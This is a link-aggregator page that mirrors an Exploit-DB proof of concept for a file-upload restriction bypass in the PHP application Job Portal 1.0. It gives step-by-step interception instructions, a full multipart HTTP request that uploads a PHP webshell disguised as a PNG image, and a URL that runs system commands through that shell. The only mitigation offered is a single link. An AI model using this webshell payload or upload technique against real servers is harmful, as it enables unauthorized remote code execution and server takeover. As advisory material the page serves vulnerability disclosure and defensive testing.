11

[webapps] Job Portal 1.0 - File Upload Restriction Bypass

 1 year ago
source link: https://www.exploit-db.com/exploits/51440
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Job Portal 1.0 - File Upload Restriction Bypass

EDB-ID:

51440

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2023-05-13

Vulnerable App:

<!--
# Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://phpgurukul.com/job-portal-project/
# Software Link:
https://phpgurukul.com/?smd_process_download=1&download_id=7855
# Version: 1.0
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps


1. Description

File Upload Restriction Bypass vulnerabilities were found in Job Portal
1.0. This allows for an authenticated user to potentially obtain RCE via
webshell.


2. Proof of Concept

1. Go the user profile >> (/jobportal/applicant/)
2.- Select profile image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.png
5. Alter request in the upload...
   Update 'filename' to desired extension. ex: shell.php
   Not neccesary change content type to 'image/png'

Example exploitation request:

====================================================================================================

POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos
HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------57052814523281
Content-Length: 555
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id=
Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------57052814523281
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000
-----------------------------57052814523281
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: image/png

?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>
IEND
-----------------------------57052814523281
Content-Disposition: form-data; name="savephoto"


-----------------------------57052814523281--

====================================================================================================

6. Send the request and visit your new webshell
   Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami
       nt authority\system

3. Solution:

Patch:
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

-->

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK